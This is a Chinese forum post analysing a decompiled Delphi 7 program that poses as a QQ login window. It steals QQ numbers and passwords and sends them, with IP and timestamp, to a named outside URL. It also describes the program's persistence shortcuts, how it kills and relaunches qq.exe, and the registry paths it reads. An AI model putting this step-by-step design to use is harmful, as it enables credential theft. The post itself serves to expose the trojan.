这是Delphi 7所写的程序,无壳,所以非常容易地使用DeDe就可以反编译了
然后用Delphi 7打开,其窗口类和各个对象就一览无余了。
看完了之后,我的确想笑,因为这种东东,随便一个Delphi的初学者,就整得出来的。
你可以看到,它的窗口乍一看来和真正的QQ窗口很像:
附件:
您所在的用户组无法下载或查看附件这个窗口的组成,可见反编译后的pas文件:
TForm1=class(TForm)
Image1: TImage;
Edit1: TEdit;
Edit2: TEdit;
Image2: TImage;
IdHTTP1: TIdHTTP;
procedure Image2Click(Sender : TObject);
procedure FormCreate(Sender : TObject);
procedure Edit2KeyDown(Sender : TObject);
procedure FormShow(Sender : TObject);
private
{ Private declarations }
public
{ Public declarations }
end ;
主窗口为TForm1类
两个文本输入框为TEdit类,分别为Edit1(输入QQ号)和Edit2(输入密码)
而登录按钮,其实是个图,TImage类,名为Image2
窗口客户区的其他内容,其实就是另一张图Image1伪装出来的
另外还有一个TIdHTTP类的IdHTTP1组件。这个组件在程序运行的时候,是不可视组件,也就是其实是见不到的。
用Delphi的初学者就知道,这个组件就是indy包中的最常用的进行网络访问的类,直接使用其Get方法就可以访问网络URL地址。
这个组件在这里就是为了把用户输入的用户名和密码传送出去。
显然,
这是一个通过将自身伪装成QQ登录窗口,诱骗用户输入用户名和密码,并将用户名与密码传送出去的程序。窗口(也就是这个程序)主要的功能和动作,包含在它的几个procedure中。
按通常的程序运行和用户点击的顺序,大致过程和功能分别如下:
1. 程序首次被运行:
procedure FormCreate(Sender : TObject);{当程序运行,窗口收到WM_CREATE消息时,该函数被调用}
begin
通过读取注册表
[HKEY_CURRENT_USER\Software\MicroSoft\Windows\CurrentVersion\Explorer\Shell Folders]
中的Desktop、Start Menu两个键的值
得到当前用户的桌面和开始菜单的路径
然后向这两个路径下写入"腾讯QQ.lnk"快捷方式,指向程序自身
使用TlHelp32系列API遍历进程,查找其中是否有真正的QQ进程"qq.exe",有则结束其进程。
检查自身文件路径是否为"C:\Program Files\aq.exe",如不是,则将自身文件copy到C:\Program Files\aq.exe并运行之,之后自身退出。end;
程序第一次运行时,路径不在C:\Program Files\aq.exe,因此只进行到FormCreate过程之后,就结束了。
这时C:\Program Files\aq.exe则已被运行起来。
C:\Program Files\aq.exe的动作:
2.
C:\Program Files\aq.exe运行后,同样再跑一次FormCreate,这时开始菜单和桌面下的腾讯QQ.lnk的目标就变成了C:\Program Files\aq.exe之后程序不退出,继续
3.procedure FormShow(Sender : TObject);{窗口收到WM_SHOW消息时被调用}
begin
使用TIdHTTP1组件,访问http://www.ip138.cn/从返回的源文件内容中得到本机的IP地址,保存起来。end;
这个步骤完了之后,窗口就出来了。接着就等着用户输入用户名和密码,并按回车或者点“登录”的图片了
4.procedure Edit2KeyDown(Sender : TObject);{密码输入框,当用户每次在其中用键盘输入时,此函数被调用}
begin
判断输入的字符是不是0x0D,是则说明用户按下了回车键,调用Image2Click。
end;
5.procedure Image2Click(Sender : TObject);{当用户按下“登录”的图片,或在密码输入框按回车键时,此函数被调用}
begin
获得Edit1中的用户名字符串,以及Edit2中的密码、之前保存下来的IP地址、当前的日期和时间
把这些组成如下URL(设输入的用户名和密码分别为111111111及ABCDABCD,IP为192.168.1.0,时间为2008-7-6 15:00:00):
"http://qazx.okok8.net/8/2.asp?user=111111111&pass=ABCDABCD 192.168.1.0 2008-7-6 15:00:00"
调用IE进程访问此URL地址。实际上也就是通过2.asp对参数的识别传送了QQ用户名密码、IP地址以及时间的信息。
最后,访问注册表
[HKEY_LOCAL_MACHINE\SOFTWARE\Tencent\PlatForm_TYPE_LIST\1]
通过其中的TypePath键值,得到QQ程序的全路径
然后将用户输入的用户名和密码作为参数,通过WinExe启动QQ程序
最后,自身程序退出。end;
